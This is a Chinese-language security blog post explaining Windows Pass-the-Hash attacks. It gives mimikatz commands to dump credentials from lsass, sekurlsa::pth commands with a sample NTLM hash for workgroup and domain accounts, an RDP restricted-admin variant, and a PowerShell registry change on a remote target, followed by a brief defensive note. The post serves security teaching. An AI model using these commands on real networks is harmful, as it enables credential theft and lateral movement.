<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>PTH(Pass The Hash) 攻击分析 - Geekby&#39;s Blog</title><meta name="Description" content="PTH(Pass The Hash) 攻击原理及实验"><meta property="og:title" content="PTH(Pass The Hash) 攻击分析" />
<meta property="og:description" content="PTH(Pass The Hash) 攻击原理及实验" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2019-04-29T14:17:00+08:00" />
<meta property="article:modified_time" content="2019-04-29T14:17:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="PTH(Pass The Hash) 攻击分析"/>
<meta name="twitter:description" content="PTH(Pass The Hash) 攻击原理及实验"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/" /><link rel="prev" href="https://www.geekby.site/2019/03/ctf%E4%B8%AD%E7%9A%84php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" /><link rel="next" href="https://www.geekby.site/2019/04/kerberoasting-%E6%94%BB%E5%87%BB/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "PTH(Pass The Hash) 攻击分析",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2019\/04\/pthpass-the-hash-%E6%94%BB%E5%87%BB\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "域安全, 内网渗透","wordcount":  235 ,
        "url": "https:\/\/www.geekby.site\/2019\/04\/pthpass-the-hash-%E6%94%BB%E5%87%BB\/","datePublished": "2019-04-29T14:17:00+08:00","dateModified": "2019-04-29T14:17:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "PTH(Pass The Hash) 攻击原理及实验"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">PTH(Pass The Hash) 攻击分析</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"><i class="far fa-folder fa-fw"></i>内网渗透</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2019-04-29">2019-04-29</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 235 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 2 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#1-概述">1 概述</a></li>
    <li><a href="#2-uac">2 UAC</a></li>
    <li><a href="#3-攻击">3 攻击</a>
      <ul>
        <li><a href="#31-工作组">3.1 工作组</a></li>
        <li><a href="#32-域内用户">3.2 域内用户</a></li>
      </ul>
    </li>
    <li><a href="#4-kb2871997">4 KB2871997</a></li>
    <li><a href="#5-针对-rdp-的-hash-传递攻击">5 针对 RDP 的 hash 传递攻击</a></li>
    <li><a href="#6-防御">6 防御</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="pthpass-the-hash-攻击">PTH(Pass The Hash) 攻击</h1>
<h2 id="1-概述">1 概述</h2>
<p>获取一台主机的本地管理员组成员账号的口令 <code>NTLM</code> 后，不需破解获取口令明文，使用 <code>PTH</code> 方式，将管理员账号及 <code>NTLM</code> 注入当前会话作为凭据，利用该凭证可以渗透获取周围主机的管理权限</p>
<p>对方主机需存在相同的账号，且是管理员组成员</p>
<p>在 <code>Windows NT 5.x</code> 系统中，管理员组账号的网络登录均能获取系统管理权</p>
<p>在 <code>Windows NT 6.x</code> 系统及更高的版本中，管理员组(<code>SID</code>非<code>500</code>)账号的网络登录不能获取系统管理权限，<code>administrator</code>(SID为500)账号的网络登录能获取系统管理权</p>
<p>这类攻击适用于：</p>
<ul>
<li>
<p>域/工作组环境</p>
</li>
<li>
<p>可以获得 hash，但是条件不允许对 hash 爆破</p>
</li>
<li>
<p>内网中存在和当前机器相同的密码</p>
</li>
</ul>
<h2 id="2-uac">2 UAC</h2>
<p>用户帐户控制 (<code>User Account Control</code>) 是 <code>Windows Vista</code>（及更高版本操作系统）中一组新的基础结构技术，可以帮助阻止恶意程序（有时也称为&quot;恶意软件&quot;）损坏系统，同时也可以帮助组织部署更易于管理的平台。
使用 <code>UAC</code>，应用程序和任务总是在非管理员帐户的安全上下文中运行，但管理员专门给系统授予管理员级别的访问权限时除外。<code>UAC</code> 会阻止未经授权应用程序的自动安装，防止无意中对系统设置进行更改。</p>
<p>用户帐户控制(<code>UAC</code>)是新版 <code>Windows</code> 的核心安全功能，也是其最常被人误解的众多安全功能当中的一种。</p>
<ul>
<li><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken</code>，UAC就是通过上面的注册表键值来判断，默认设置为 0。如果设置为 1，则 SID 为 500 的管理员也不能通过网络登录的方式获取高权限。</li>
<li><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</code>，如果在注册表中有这个键值，并且设置为 1，则所有的管理组成员都可以通过网络登录获取高权限。且管上面的一个表项 FilterAdministratorToken 的值。</li>
</ul>
<h2 id="3-攻击">3 攻击</h2>
<p><code>mimikatz</code> 的 <code>pth</code> 功能需要本地管理员权限，这是由它的实现机制决定的，需要先获得高权限进程 <code>lsass.exe</code> 的信息</p>
<p>对于 <code>8.1/2012r2</code>，安装补丁<code>KB2871997</code> 的 <code>Win 7/2008r2/8/2012</code>，可以使用 <code>AES keys</code> 代替 <code>NT hash</code></p>
<p>使用 <code>mimikatz</code> 先获取 <code>hash</code>:</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">privilege::debug
</span></span><span class="line"><span class="cl">sekurlsa::logonpasswords
</span></span></code></pre></td></tr></table>
</div>
</div><p>得到 hash 后</p>
<h3 id="31-工作组">3.1 工作组</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7
</span></span></code></pre></td></tr></table>
</div>
</div><p>微软也对 pth 打过补丁，然而在测试中发现，在打了补丁后，常规的 <code>Pass The Hash</code> 已经无法成功，唯独默认的 <code>Administrator</code> (SID 500) 账号例外，利用这个账号仍可以进行 <code>Pass The Hash</code> 远程 <code>ipc</code> 连接。</p>
<h3 id="32-域内用户">3.2 域内用户</h3>
<p>前提是：域用户为本地管理组成员</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">sekurlsa::pth /user:eviluser /domain:adsec.com /ntlm:ccef208c6485269c20db2cad21734fe7
</span></span></code></pre></td></tr></table>
</div>
</div><p>域内用户不受补丁影响。</p>
<h2 id="4-kb2871997">4 KB2871997</h2>
<blockquote>
<p>Changes to this feature include: prevent network logon and remote interactive logon to domain-join ed machine using local accounts&hellip;</p>
</blockquote>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143726.png-water_print" /></p>
<p>安装 <code>KB2871997</code> 补丁后，其他方面并没有太多的变化 。补丁会给本地账号添加一个 <code>S-1-5-113</code> 的 <code>SID</code>，为管理组中的本地账号添加一个 <code>S-1-5-114</code> 的 <code>SID</code>，这样方便通过域策略进行管理，例如从域策略中全面禁止这类账号的网络登录。</p>
<h2 id="5-针对-rdp-的-hash-传递攻击">5 针对 RDP 的 hash 传递攻击</h2>
<p>说起 hash 传递攻击（pth），想到一般的都是 psexec wce mimikatz 等直接执行命令。</p>
<p>本节绍了一种利用 mimikatz + NThash 来启动 mstsc.exe 实现远程登陆 windows 桌面的方法，对不能执行命令又破解不出密码的环境有很大的帮助。</p>
<p>其原理（条件）是远程目标需要使用受限管理模式（Restricted Admin Mode），因为此模式下支持 kerberos 认证，所以能使用 hash 来登陆。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sekurlsa::pth /user:&lt;user name&gt; /domain:&lt;domain name&gt; /ntlm:&lt;the user<span class="err">&#39;</span>s ntlm hash&gt; /run:<span class="s2">&#34;mstsc.exe /restrictedadmin&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>如果受限管理模式被禁用，使用如下命令开启：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mimikatz.exe <span class="s2">&#34;sekurlsa::pth /user:&lt;user name&gt; /domain:&lt;domain name&gt; /ntlm:&lt;the user&#39;s ntlm hash&gt; /run:powershell.exe&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>在弹出的 powershell 窗口修改注册表：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Enter-PSSession -Computer &lt;Target&gt;
</span></span><span class="line"><span class="cl">New-ItemProperty -Path <span class="s2">&#34;HKLM:\System\CurrentControlSet\Control\Lsa&#34;</span> -Name <span class="s2">&#34;DisableRestrictedAdmin&#34;</span> -Value <span class="s2">&#34;0&#34;</span> -PropertyType DWORD -Force
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="6-防御">6 防御</h2>
<p><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Policies\System\FilterAdministratorToken</code>，系统中一个有 <code>Admin ApprovalMode</code>，<code>UAC</code> 就是通过上面的注册表键值来判断，默认设置为 <code>0</code>。如果设置为 <code>1</code>，则 <code>SID</code> 为 <code>500</code> 的管理员也不能通过网络登录的方式获取高权限。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200429143747.png-water_print" /></p>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2019-04-29</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/" data-title="PTH(Pass The Hash) 攻击分析"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/" data-title="PTH(Pass The Hash) 攻击分析"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/" data-title="PTH(Pass The Hash) 攻击分析"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E5%9F%9F%E5%AE%89%E5%85%A8/">域安全</a>,&nbsp;<a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2019/03/ctf%E4%B8%AD%E7%9A%84php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="prev" rel="prev" title="CTF 中的 PHP 代码审计"><i class="fas fa-angle-left fa-fw"></i>CTF 中的 PHP 代码审计</a>
            <a href="/2019/04/kerberoasting-%E6%94%BB%E5%87%BB/" class="next" rel="next" title="Kerberoasting 攻击">Kerberoasting 攻击<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
